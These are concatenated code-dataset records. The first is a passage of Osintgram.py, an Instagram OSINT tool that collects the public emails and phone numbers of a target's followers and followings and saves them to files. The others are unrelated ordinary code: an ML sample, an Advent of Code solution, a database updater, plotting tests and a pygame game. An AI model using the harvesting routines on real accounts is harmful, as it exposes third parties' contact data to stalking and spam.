'public_email' in user['user'] and user['user']['public_email']:\n follow['email'] = user['user']['public_email']\n if len(results) > value:\n break\n results.append(follow)\n\n except ClientThrottledError as e:\n pc.printout(\"\\nError: Instagram blocked the requests. Please wait a few minutes before you try again.\", pc.RED)\n pc.printout(\"\\n\")\n\n if len(results) > 0:\n\n t = PrettyTable(['ID', 'Username', 'Full Name', 'Email'])\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n t.align[\"Email\"] = \"l\"\n\n json_data = {}\n\n for node in results:\n t.add_row([str(node['id']), node['username'], node['full_name'], node['email']])\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_fwersemail.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['followers_email'] = results\n json_file_name = self.output_dir + \"/\" + self.target + \"_fwersemail.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n print(t)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_fwingsemail(self):\n if self.check_private_profile():\n return\n\n followings = []\n\n try:\n\n pc.printout(\"Searching for emails of users followed by target... this can take a few minutes\\n\")\n\n rank_token = AppClient.generate_uuid()\n data = self.api.user_following(str(self.target_id), rank_token=rank_token)\n\n for user in data.get('users', []):\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followings.append(u)\n\n next_max_id = data.get('next_max_id')\n \n while next_max_id:\n results = self.api.user_following(str(self.target_id), rank_token=rank_token, max_id=next_max_id)\n\n for user in results.get('users', []):\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followings.append(u)\n\n next_max_id = results.get('next_max_id')\n \n results = []\n \n pc.printout(\"Do you want to get all emails? y/n: \", pc.YELLOW)\n value = input()\n \n if value == str(\"y\") or value == str(\"yes\") or value == str(\"Yes\") or value == str(\"YES\"):\n value = len(followings)\n elif value == str(\"\"):\n print(\"\\n\")\n return\n elif value == str(\"n\") or value == str(\"no\") or value == str(\"No\") or value == str(\"NO\"):\n while True:\n try:\n pc.printout(\"How many emails do you want to get? \", pc.YELLOW)\n new_value = int(input())\n value = new_value - 1\n break\n except ValueError:\n pc.printout(\"Error! Please enter a valid integer!\", pc.RED)\n print(\"\\n\")\n return\n else:\n pc.printout(\"Error! Please enter y/n :-)\", pc.RED)\n print(\"\\n\")\n return\n\n for follow in followings:\n sys.stdout.write(\"\\rCatched %i followings email\" % len(results))\n sys.stdout.flush()\n user = self.api.user_info(str(follow['id']))\n if 'public_email' in user['user'] and user['user']['public_email']:\n follow['email'] = user['user']['public_email']\n if len(results) > value:\n break\n results.append(follow)\n \n except ClientThrottledError as e:\n pc.printout(\"\\nError: Instagram blocked the requests. Please wait a few minutes before you try again.\", pc.RED)\n pc.printout(\"\\n\")\n \n print(\"\\n\")\n\n if len(results) > 0:\n t = PrettyTable(['ID', 'Username', 'Full Name', 'Email'])\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n t.align[\"Email\"] = \"l\"\n\n json_data = {}\n\n for node in results:\n t.add_row([str(node['id']), node['username'], node['full_name'], node['email']])\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_fwingsemail.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['followings_email'] = results\n json_file_name = self.output_dir + \"/\" + self.target + \"_fwingsemail.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n print(t)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_fwingsnumber(self):\n if self.check_private_profile():\n return\n \n try:\n\n pc.printout(\"Searching for phone numbers of users followed by target... this can take a few minutes\\n\")\n\n followings = []\n\n rank_token = AppClient.generate_uuid()\n data = self.api.user_following(str(self.target_id), rank_token=rank_token)\n\n for user in data.get('users', []):\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followings.append(u)\n\n next_max_id = data.get('next_max_id')\n \n while next_max_id:\n results = self.api.user_following(str(self.target_id), rank_token=rank_token, max_id=next_max_id)\n\n for user in results.get('users', []):\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followings.append(u)\n\n next_max_id = results.get('next_max_id')\n \n results = []\n \n pc.printout(\"Do you want to get all phone numbers? y/n: \", pc.YELLOW)\n value = input()\n \n if value == str(\"y\") or value == str(\"yes\") or value == str(\"Yes\") or value == str(\"YES\"):\n value = len(followings)\n elif value == str(\"\"):\n print(\"\\n\")\n return\n elif value == str(\"n\") or value == str(\"no\") or value == str(\"No\") or value == str(\"NO\"):\n while True:\n try:\n pc.printout(\"How many phone numbers do you want to get? \", pc.YELLOW)\n new_value = int(input())\n value = new_value - 1\n break\n except ValueError:\n pc.printout(\"Error! Please enter a valid integer!\", pc.RED)\n print(\"\\n\")\n return\n else:\n pc.printout(\"Error! Please enter y/n :-)\", pc.RED)\n print(\"\\n\")\n return\n\n for follow in followings:\n sys.stdout.write(\"\\rCatched %i followings phone numbers\" % len(results))\n sys.stdout.flush()\n user = self.api.user_info(str(follow['id']))\n if 'contact_phone_number' in user['user'] and user['user']['contact_phone_number']:\n follow['contact_phone_number'] = user['user']['contact_phone_number']\n if len(results) > value:\n break\n results.append(follow)\n\n except ClientThrottledError as e:\n pc.printout(\"\\nError: Instagram blocked the requests. Please wait a few minutes before you try again.\", pc.RED)\n pc.printout(\"\\n\")\n \n print(\"\\n\")\n\n if len(results) > 0:\n t = PrettyTable(['ID', 'Username', 'Full Name', 'Phone'])\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n t.align[\"Phone number\"] = \"l\"\n\n json_data = {}\n\n for node in results:\n t.add_row([str(node['id']), node['username'], node['full_name'], node['contact_phone_number']])\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_fwingsnumber.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['followings_phone_numbers'] = results\n json_file_name = self.output_dir + \"/\" + self.target + \"_fwingsnumber.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n print(t)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_fwersnumber(self):\n if self.check_private_profile():\n return\n\n followings = []\n\n try:\n\n pc.printout(\"Searching for phone numbers of users followers... this can take a few minutes\\n\")\n\n\n rank_token = AppClient.generate_uuid()\n data = self.api.user_following(str(self.target_id), rank_token=rank_token)\n\n for user in data.get('users', []):\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followings.append(u)\n\n next_max_id = data.get('next_max_id')\n \n while next_max_id:\n results = self.api.user_following(str(self.target_id), rank_token=rank_token, max_id=next_max_id)\n\n for user in results.get('users', []):\n u = {\n 'id': user['pk'],\n 'username': user['username'],\n 'full_name': user['full_name']\n }\n followings.append(u)\n\n next_max_id = results.get('next_max_id')\n \n results = []\n \n pc.printout(\"Do you want to get all phone numbers? y/n: \", pc.YELLOW)\n value = input()\n \n if value == str(\"y\") or value == str(\"yes\") or value == str(\"Yes\") or value == str(\"YES\"):\n value = len(followings)\n elif value == str(\"\"):\n print(\"\\n\")\n return\n elif value == str(\"n\") or value == str(\"no\") or value == str(\"No\") or value == str(\"NO\"):\n while True:\n try:\n pc.printout(\"How many phone numbers do you want to get? \", pc.YELLOW)\n new_value = int(input())\n value = new_value - 1\n break\n except ValueError:\n pc.printout(\"Error! Please enter a valid integer!\", pc.RED)\n print(\"\\n\")\n return\n else:\n pc.printout(\"Error! Please enter y/n :-)\", pc.RED)\n print(\"\\n\")\n return\n\n for follow in followings:\n sys.stdout.write(\"\\rCatched %i followers phone numbers\" % len(results))\n sys.stdout.flush()\n user = self.api.user_info(str(follow['id']))\n if 'contact_phone_number' in user['user'] and user['user']['contact_phone_number']:\n follow['contact_phone_number'] = user['user']['contact_phone_number']\n if len(results) > value:\n break\n results.append(follow)\n\n except ClientThrottledError as e:\n pc.printout(\"\\nError: Instagram blocked the requests. Please wait a few minutes before you try again.\", pc.RED)\n pc.printout(\"\\n\")\n\n print(\"\\n\")\n\n if len(results) > 0:\n t = PrettyTable(['ID', 'Username', 'Full Name', 'Phone'])\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n t.align[\"Phone number\"] = \"l\"\n\n json_data = {}\n\n for node in results:\n t.add_row([str(node['id']), node['username'], node['full_name'], node['contact_phone_number']])\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_fwersnumber.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['followings_phone_numbers'] = results\n json_file_name = self.output_dir + \"/\" + self.target + \"_fwerssnumber.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n\n print(t)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def get_comments(self):\n if self.check_private_profile():\n return\n\n pc.printout(\"Searching for users who commented...\\n\")\n\n data = self.__get_feed__()\n users = []\n\n for post in data:\n comments = self.__get_comments__(post['id'])\n for comment in comments:\n print(comment['text'])\n \n # if not any(u['id'] == comment['user']['pk'] for u in users):\n # user = {\n # 'id': comment['user']['pk'],\n # 'username': comment['user']['username'],\n # 'full_name': comment['user']['full_name'],\n # 'counter': 1\n # }\n # users.append(user)\n # else:\n # for user in users:\n # if user['id'] == comment['user']['pk']:\n # user['counter'] += 1\n # break\n\n if len(users) > 0:\n ssort = sorted(users, key=lambda value: value['counter'], reverse=True)\n\n json_data = {}\n\n t = PrettyTable()\n\n t.field_names = ['Comments', 'ID', 'Username', 'Full Name']\n t.align[\"Comments\"] = \"l\"\n t.align[\"ID\"] = \"l\"\n t.align[\"Username\"] = \"l\"\n t.align[\"Full Name\"] = \"l\"\n\n for u in ssort:\n t.add_row([str(u['counter']), u['id'], u['username'], u['full_name']])\n\n print(t)\n\n if self.writeFile:\n file_name = self.output_dir + \"/\" + self.target + \"_users_who_commented.txt\"\n file = open(file_name, \"w\")\n file.write(str(t))\n file.close()\n\n if self.jsonDump:\n json_data['users_who_commented'] = ssort\n json_file_name = self.output_dir + \"/\" + self.target + \"_users_who_commented.json\"\n with open(json_file_name, 'w') as f:\n json.dump(json_data, f)\n else:\n pc.printout(\"Sorry! No results found :-(\\n\", pc.RED)\n\n def clear_cache(self):\n try:\n f = open(\"config/settings.json\",'w')\n f.write(\"{}\")\n pc.printout(\"Cache Cleared.\\n\",pc.GREEN)\n except FileNotFoundError:\n pc.printout(\"Settings.json don't exist.\\n\",pc.RED)\n finally:\n f.close()\n","repo_name":"Datalux/Osintgram","sub_path":"src/Osintgram.py","file_name":"Osintgram.py","file_ext":"py","file_size_in_byte":60313,"program_lang":"python","lang":"en","doc_type":"code","stars":7814,"dataset":"github-code","pt":"21"} +{"seq_id":"28201177600","text":"import sys\nsys.path.append('../../') #this to include the parent directory\nimport beeBrain.neuralNetworks as nn\nimport numpy as np\n\nnp.random.seed(1)\nf = np.load('./datasets/cnn_dataset01.npz')\ntrain_x, train_y = f['x_train'][:, :, :, None], f['y_train'][:, None]\ntest_x, test_y = f['x_test'][:2000][:, :, :, None], f['y_test'][:2000]\n\ntrain_loader = nn.DataLoader(train_x, train_y, batch_size=64)\n\nclass CNN(nn.Module):\n def __init__(self):\n super().__init__()\n self.seq_layers = self.sequential(\n nn.layers.Conv2D(1, 6, (5, 5), (1, 1), \"same\", channels_last=True), # => [n,28,28,6]\n nn.layers.MaxPool2D(2, 2), # => [n, 14, 14, 6]\n nn.layers.Conv2D(6, 16, 5, 1, \"same\", channels_last=True), # => [n,14,14,16]\n nn.layers.MaxPool2D(2, 2), # => [n,7,7,16]\n nn.layers.Flatten(), # => [n,7*7*16]\n nn.layers.Dense(7 * 7 * 16, 10, )\n )\n\n def forward(self, x):\n o = self.seq_layers.forward(x)\n return o\n\n\ncnn = CNN()\nopt = nn.optim.Adam(cnn.params, 0.001)\nloss_fn = nn.losses.SparseSoftMaxCrossEntropyWithLogits()\n\n\nfor step in range(300):\n bx, by = train_loader.next_batch()\n by_ = cnn.forward(bx)\n loss = loss_fn(by_, by)\n cnn.backward(loss)\n opt.step()\n if step % 50 == 0:\n ty_ = cnn.forward(test_x)\n acc = nn.metrics.accuracy(np.argmax(ty_.data, axis=1), test_y)\n print(\"Step: %i | loss: %.3f | acc: %.2f\" % (step, loss.data, acc))\n\n","repo_name":"devhima/beeBrain","sub_path":"samples/nn_samples/cnn_sample.py","file_name":"cnn_sample.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"5778472696","text":"from collections import defaultdict\nfrom math import prod\n\nIN_FILE_PATH = \"advent_of_code/2023/day3/3.txt\"\nIN_FILE_EX3 = \"advent_of_code/2023/day3/ex_3.txt\"\n\n\ndef parse_schematic(infile: str) -> list[list]:\n \"\"\"Parse schematic from file\n\n Args:\n infile: Input file path\n\n Returns:\n 2D matrix holding the engine schematic\n \"\"\"\n\n with open(infile, \"r\") as file:\n return [[c for c in line.strip()] for line in file]\n\n\ndef day_3a(infile):\n sch = parse_schematic(infile)\n m = len(sch) # of rows\n n = len(sch[0]) # of cols\n\n def special_search(i, j):\n # Searches for special characters surrounding the given location\n\n for k in range(i - 1, i + 2):\n for l in range(j - 1, j + 2):\n if not (k == i and l == j) and 0 <= k < m and 0 <= l < n:\n cur = sch[k][l]\n if not cur.isnumeric() and cur != \".\":\n return True\n return False\n\n ans = 0\n for i, row in enumerate(sch):\n nums = []\n part_num = False\n for j, col in enumerate(sch[i]):\n cur = sch[i][j]\n if cur.isnumeric():\n nums.append(sch[i][j])\n if not part_num:\n part_num = special_search(i, j)\n else:\n if part_num:\n ans += int(\"\".join(nums))\n nums.clear()\n part_num = False\n if part_num and nums:\n ans += int(\"\".join(nums))\n\n return ans\n\n\ndef day_3b(infile):\n sch = parse_schematic(infile)\n m = len(sch) # of rows\n n = len(sch[0]) # of cols\n stars = defaultdict(list)\n\n def star_search(i, j):\n # Searches for \"*\" chars surrounding given location and returns their location\n\n for k in range(i - 1, i + 2):\n for l in range(j - 1, j + 2):\n if not (k == i and l == j) and 0 <= k < m and 0 <= l < n:\n cur = sch[k][l]\n if cur == \"*\":\n return k, l\n return None\n\n ans = 0\n for i, row in enumerate(sch):\n nums = []\n gear_loc = None\n for j, col in enumerate(sch[i]):\n cur = sch[i][j]\n if cur.isnumeric():\n nums.append(sch[i][j])\n if not gear_loc:\n gear_loc = star_search(i, j)\n else:\n if gear_loc:\n stars[gear_loc].append(int(\"\".join(nums)))\n nums.clear()\n gear_loc = None\n if gear_loc and nums:\n stars[gear_loc].append(int(\"\".join(nums)))\n\n return sum(prod(starset) for starset in stars.values() if len(starset) == 2)\n\n\nprint(day_3a(IN_FILE_EX3))\nprint(day_3a(IN_FILE_PATH))\nprint(day_3b(IN_FILE_EX3))\nprint(day_3b(IN_FILE_PATH))\n\nassert day_3a(IN_FILE_EX3) == 4361\nassert day_3a(IN_FILE_PATH) == 535351\nassert day_3b(IN_FILE_EX3) == 467835\nassert day_3b(IN_FILE_PATH) == 87287096\n","repo_name":"jowls/challenges","sub_path":"advent_of_code/2023/day3/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15134618367","text":"# coding: utf-8\nif '__file__' in globals():\n import os, sys\n sys.path.append(os.path.join(os.path.dirname(__file__), '..'))\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom dezero import Variable\nfrom dezero import optimizers\nimport dezero.functions as F\nfrom dezero.models import MLP\n\n# step45.pyと同じ\n\n# データセット\nnp.random.seed(0)\nx = np.random.rand(100, 1)\ny = np.sin(2 * np.pi * x) + np.random.rand(100, 1)\n\n# ハイパラの設定\nlr = 0.2\nmax_iter = 10000\nhidden_size = 10\n\nmodel = MLP((hidden_size, 1))\noptimizer = optimizers.MomentumSGD(lr)\noptimizer.setup(model)\n\n# それか次の1行でまとめることもできる\n# optimizer = optimizers.SGD(lr).setup(model)\n\n\n# 学習の開始\nfor i in range(max_iter):\n y_pred = model(x)\n loss = F.mean_squared_error(y, y_pred)\n\n model.cleargrads()\n loss.backward()\n\n optimizer.update()\n if i % 1000 == 0:\n print(loss)","repo_name":"miyamotononno/dl_from_scratch","sub_path":"DLfromS3/steps/step46.py","file_name":"step46.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21517237681","text":"\"\"\"\nParent program for the API_DB_Mediator.\nUse from command line to initialize specific tables (or all) (py db_updater.py -t [table_name]) \nDouble click or run with no args for GUI interface.\n\nAuthor: Nikolas Kovacs\n\"\"\"\nfrom api_db_mediator import API_DB_Mediator\nimport argparse\nimport threading\n\ndef update(tables_to_update, table_args, ui=None):\n def update_table(method_args, event_to_set):\n if len(method_args) == 1: # method takes no args\n method_args[0]()\n else:\n method_args[0](method_args[1])\n event_to_set.set()\n\n def update_ui(ui, table_to_update, stop, end_thread_event):\n # time_estimates = get_estimate_times_for_updates()\n still_updating = True\n progress_bar = 0\n while still_updating and not stop():\n if progress_bar < 100:\n ui.progressChanged.emit(progress_bar + 1) # temporary solution until we have estimated times\n progress_bar += 1\n time.sleep(0.2)\n else:\n still_updating = False\n ui.update_label(f\"Updating {table_to_update}... Do not close this window.\")\n end_thread_event.set()\n \n\n\n for table_to_update in tables_to_update:\n ui_stop_thread_event = threading.Event()\n ui_thread_ended_event = threading.Event()\n ui_stop_thread = False\n\n if ui:\n ui_updater_thread = threading.Thread(target=update_ui, args=(ui, table_to_update, lambda: ui_stop_thread, ui_thread_ended_event), daemon=True, name=\"ui_updater_thread\")\n ui_updater_thread.start()\n\n update_table(table_args[table_to_update], ui_stop_thread_event)\n \n ui_stop_thread_event.wait()\n ui_stop_thread = True\n ui_thread_ended_event.wait()\n \n if ui:\n ui.progressChanged.emit(100)\n time.sleep(0.5)\n ui.update_label(\"Done updating. You may close this window.\")\n\n\ndef get_estimate_times_for_updates():\n pass\n\ndef init_args(db):\n return {\n \"initalize_all\": [db.initialize_db],\n \"states\": [db._API_DB_Mediator__init_states_table],\n \"counties\": [db._API_DB_Mediator__init_counties_table],\n \"county_unemployment\": [db._API_DB_Mediator__init_county_unemployment_table],\n \"state_unemployment\": [db._API_DB_Mediator__init_state_unemployment_table],\n \"county_workers\": [db._API_DB_Mediator__init_county_workers_table],\n \"county_employment\": [db._API_DB_Mediator__init_employment_table, \"COUNTY\"],\n \"state_employment\": [db._API_DB_Mediator__init_employment_table, \"STATE\"],\n \"us_employment\": [db._API_DB_Mediator__init_employment_table, \"US\"],\n \"county_data\": [db._API_DB_Mediator__init_census_county_data_table],\n \"state_data\": [db._API_DB_Mediator__init_census_state_data_table],\n \"county_poverty\": [db._API_DB_Mediator__init_census_county_poverty_table],\n \"state_poverty\": [db._API_DB_Mediator__init_census_state_poverty_table],\n \"school_districts\": [db._API_DB_Mediator__init_census_school_districts_table],\n \"zipcodes\": [db._API_DB_Mediator__init_zipcodes_table],\n \"county_gdp\": [db._API_DB_Mediator__init_gdp_table, \"COUNTY\"],\n \"state_gdp\": [db._API_DB_Mediator__init_gdp_table, \"STATE\"],\n }\n\nif __name__ == \"__main__\":\n db = API_DB_Mediator()\n table_args = init_args(db)\n\n parser = argparse.ArgumentParser(description=\"CLI for updating tables in the Demographic Database\\n\"\\\n \"Run with no arguments to open GUI\"\\\n \"Run with single table argument to update that table\"\\\n \"./db_updater.exe -h for help\")\n parser.add_argument(\"-t\", \"--table\", type=str, choices=table_args.keys(), help=\"Enter a table to update\")\n args = parser.parse_args()\n table_to_update = args.table\n\n # if table argument provided, update that table\n # otherwise, open gui and let user select table(s) to update\n if table_to_update:\n update([table_to_update], table_args)\n else:\n import sys\n import time\n from db_updater_gui import GUI\n from PyQt5 import QtWidgets\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = GUI(MainWindow)\n MainWindow.show()\n\n def try_to_get_tables_and_update():\n tables_to_update = None\n while not tables_to_update:\n tables_to_update = ui.get_tables_to_update()\n time.sleep(0.5)\n update(tables_to_update, table_args, ui)\n\n thread = threading.Thread(target=try_to_get_tables_and_update, daemon=True)\n thread.start()\n\n sys.exit(app.exec_())\n","repo_name":"nikovacs/Demographic-API-and-Database-Controller","sub_path":"db_updater.py","file_name":"db_updater.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71004919414","text":"import scene\nfrom euclid import *\nfrom math import *\nfrom scene import LightSet, Triangle, Sphere, Texture, MergedTexture\nfrom draw import Image\n\nclass Scene(scene.Scene):\n def __init__(self):\n super(Scene, self).__init__()\n lights = self.make_example_light()\n lights.add_diffuse(Vector3(0, 1, 0),\n Vector3(0, 0, 1))\n\n def tex_color(x):\n X = 0.3\n if (x.x % (X*2)) < X != (x.y % (X*2)) < X:\n return Vector3(0, 0, 1)\n else:\n return Vector3(1, 1, 1)\n\n img = Image.load('linux.jpg')\n tex_img = Texture(img, Vector2(2, -2))\n\n d = 50\n S = 13\n self.objects += self.make_tetrahedron(\n lights,\n Vector3(-2, -3, d),\n Vector3(2, -3, d),\n Vector3(0, -3, d - S*2),\n Vector3(0, 2, d - S),\n texture=tex_img,\n )\n\n self.objects += [\n Sphere(lights, Vector3(0.5, 0, 29), 0.3)\n ]\n\n def make_tetrahedron(self, light, a, b, c, d, **kwargs):\n return [\n Triangle(light, a, b, c, **kwargs),\n Triangle(light, a, b, d, **kwargs),\n Triangle(light, a, c, d, **kwargs),\n Triangle(light, b, c, d, **kwargs),\n ]\n","repo_name":"zielmicha/raytracing-demo","sub_path":"textures.py","file_name":"textures.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18271927707","text":"\"\"\"Test drawing module\n\"\"\"\nimport pytest\n\nimport numpy as np\n\nfrom shellplot.axis import Axis\nfrom shellplot.drawing import (\n LegendItem,\n _draw_canvas,\n _draw_legend,\n _draw_title,\n _draw_x_axis,\n _draw_y_axis,\n _pad_lines,\n)\n\n\ndef test_draw_legend():\n legend = [LegendItem(1, \"one\"), LegendItem(2, \"two\")]\n legend_lines = [\" + one\", \" * two\"]\n assert legend_lines == _draw_legend(legend)\n\n\ndef test_draw_title():\n title_str = _draw_title(title=\"My\", x_display_max=39, left_pad=0)\n expected_title_str = \" \" * 20 + \"My\"\n assert title_str == expected_title_str\n\n\n@pytest.mark.parametrize(\n \"lines,ref_lines,expecte_padded_lines\",\n [\n ([\"a\", \"b\"], [\"a\", \"b\", \"c\"], [\"\", \"a\", \"b\"]),\n (None, [\"a\", \"b\", \"c\"], [\"\", \"\", \"\"]),\n ],\n)\ndef test_pad_lines(lines, ref_lines, expecte_padded_lines):\n padded_lines = _pad_lines(lines, ref_lines)\n assert padded_lines == expecte_padded_lines\n\n\n@pytest.mark.parametrize(\n \"axis,expected_axis_lines\",\n [\n (\n Axis(display_length=51, label=\"my_fun_label\", limits=(0, 1)),\n [\n \"└┬---------┬---------┬---------┬---------┬---------┬\\n\",\n \" 0.0 0.2 0.4 0.6 0.8 1.0\\n\",\n \" my_fun_label\",\n ],\n ),\n (\n Axis(display_length=51, label=\"my_fun_label\", limits=(0, 0.01)),\n [\n \"└┬---------┬---------┬---------┬---------┬---------┬\\n\",\n \" 0.0 0.002 0.004 0.006 0.008 0.01\\n\",\n \" my_fun_label\",\n ],\n ),\n ],\n)\ndef test_draw_x_axis(axis, expected_axis_lines):\n x_lines = _draw_x_axis(x_axis=axis, left_pad=0)\n assert x_lines == expected_axis_lines\n\n\n@pytest.mark.parametrize(\n \"axis,label,limits, expected_axis_lines\",\n [\n (\n Axis(display_length=16),\n \"my_fun_label\",\n (0, 1),\n [\n \" my_fun_label\",\n \" 0.99┤\",\n \" |\",\n \" |\",\n \" |\",\n \" |\",\n \" 0.66┤\",\n \" |\",\n \" |\",\n \" |\",\n \" |\",\n \" 0.33┤\",\n \" |\",\n \" |\",\n \" |\",\n \" |\",\n \" 0.0┤\",\n ],\n ),\n ],\n)\ndef test_draw_y_axis(axis, label, limits, expected_axis_lines):\n axis.label = label\n axis.limits = limits\n\n y_lines = _draw_y_axis(y_axis=axis, left_pad=10)\n assert y_lines == expected_axis_lines\n\n\n@pytest.mark.parametrize(\n \"canvas,expected_canvas_lines\",\n [\n (\n np.array(\n [\n [0, 0, 0, 0, 5],\n [0, 0, 0, 4, 0],\n [0, 0, 3, 0, 0],\n [0, 2, 0, 0, 0],\n [1, 0, 0, 0, 0],\n ]\n ),\n [\"@ \", \" x \", \" o \", \" * \", \" +\"],\n ),\n ],\n)\ndef test_draw_canvas(canvas, expected_canvas_lines):\n canvas_lines = _draw_canvas(canvas)\n assert canvas_lines == expected_canvas_lines\n","repo_name":"CDonnerer/shellplot","sub_path":"tests/test_drawing.py","file_name":"test_drawing.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"33700199341","text":"import os\r\nx = 100\r\ny = 100\r\n# vytvorenie hracej plochy na pozícii x a y na displeji\r\nos.environ['SDL_VIDEO_WINDOW_POS'] = \"%d,%d\" % (x,y)\r\n\r\nimport pygame\r\nimport pgzrun\r\nimport time\r\nimport random\r\n\r\nWIDTH = 800\r\nHEIGHT = 600\r\n# farba schodíkov\r\n# Postavička\r\nfox = Actor('jumper-1', (400, 550))\r\nfox_x_velocity = 0\r\nfox_y_velocitya = 0\r\ngravity = 1\r\njumping = False\r\njumped = False\r\ntimer = []\r\nposledny_schod_y = 550 # y-súradnica posledného vygenerovaného schodu\r\noptimalna_vyska_fox = 200 # súradnica kde sa fox bude stále nachádzať\r\nvyska = 0\r\nprvy_pohyb = False\r\n\r\n# (left, top, width, height)\r\n\r\n\r\n# zobrezenie na dispeji\r\ndef draw():\r\n screen.blit('oblaky', (0, 0)) # pozadie\r\n # nakreslenie schodíkov s hlavným schodom a s farbou\r\n for schod in schody:\r\n \tscreen.blit('schodík', (schod.x, schod.y))\r\n fox.draw()\r\n screen.draw.text(\"Výška:\", center=(50, 540), fontsize=40, shadow=(1, 1), color=(255, 255, 255))\r\n screen.draw.text(str(vyska)+\" m\", center=(45, 570), fontsize=40, shadow=(1, 1), color=(255, 255, 255))\r\n if fox.y > HEIGHT:\r\n \tscreen.draw.text(\"Koniec hry\", center=(400, 300), fontsize=40, shadow=(1, 1), color=(255, 255, 255))\r\n \tscreen.draw.rect(Rect((330, 330), (140,40)), (0,0,0))\r\n \tscreen.draw.text(\"Hrať znovu\", center=(400, 350), fontsize=30, shadow=(1, 1), color=(255, 255, 255))\r\n\r\n# keď sa klikne myškou na tlačidlo, reštartuje sa hra\r\ndef on_mouse_down(pos, button):\r\n\tglobal schody, vyska, jumping, jumped, posledny_schod_y, prvy_pohyb\r\n\tif fox.y > HEIGHT and pos[0] > 330 and pos[0] < 470 and pos[1] > 330 and pos[1] < 370:\r\n\t\tjumping = False\r\n\t\tjumped = False\r\n\t\tschody = []\r\n\t\tposledny_schod_y = 550\r\n\t\tschody = generate_first_schody()\r\n\t\tfox.x = 400\r\n\t\tfox.y = 550\r\n\t\tvyska = 0\r\n\t\tprvy_pohyb = False\r\n\r\n# game mechanics:\r\ndef update():\r\n\tglobal optimalna_vyska_fox, vyska, prvy_pohyb\r\n\tfox_move()\r\n\t# posúvanie schodov keď skáče + koniec počítania výšky keď sa skončí hra\r\n\tif fox.y < optimalna_vyska_fox:\r\n\t\trozdiel_vysky = optimalna_vyska_fox - fox.y\r\n\t\tfox.y = optimalna_vyska_fox\r\n\t\tfor schod in schody:\r\n\t\t\tschod.y = schod.y + rozdiel_vysky\r\n\t\t\tif schod.y > HEIGHT and fox.y < HEIGHT:\r\n\t\t\t\tschod.x = random.randrange(15, WIDTH - 315)\r\n\t\t\t\tschod.y = 0\r\n\t\t\t\tvyska += 1\r\n\t\t\t\r\n\r\n\telse:\r\n\t\trozdiel_vysky = fox.y\r\n\t# posúvanie schodov, keď neskáče (automaticky, samo)\r\n\tif prvy_pohyb:\r\n\t\tfor schod in schody:\r\n\t\t\tif vyska < 25:\r\n\t\t\t\tschod.y = schod.y + 1\r\n\t\t\t# zrýchlenie schodíkov podľa výšky, keď je fox vyššie\r\n\t\t\telif vyska < 50:\r\n\t\t\t\tschod.y = schod.y + 2\r\n\t\t\telse:\r\n\t\t\t\tschod.y = schod.y + 3\r\n\t\t\tif schod.y > HEIGHT and fox.y < HEIGHT:\r\n\t\t\t\tschod.x = random.randrange(15, WIDTH - 315)\r\n\t\t\t\tschod.y = 0\r\n\t\t\t\tvyska += 1 \r\n\r\ndef fox_move():\r\n\tglobal fox_x_velocity, fox_y_velocity, gravity, jumping, jumped, timer, optimalna_vyska_fox, vyska, prvy_pohyb\t\r\n\t# obrázok stojaci\r\n\r\n\tif fox_x_velocity == 0 and not jumped:\r\n\t\tfox.image = 'jumper-1'\r\n\r\n\t# gravity\r\n\tif collidecheck():\r\n\t\tgravity = 1\r\n\t\tfox.y -= 1\r\n\t\ttimer = []\r\n\tif not collidecheck():\r\n\t\tfox.y += gravity\r\n\t\tif gravity <= 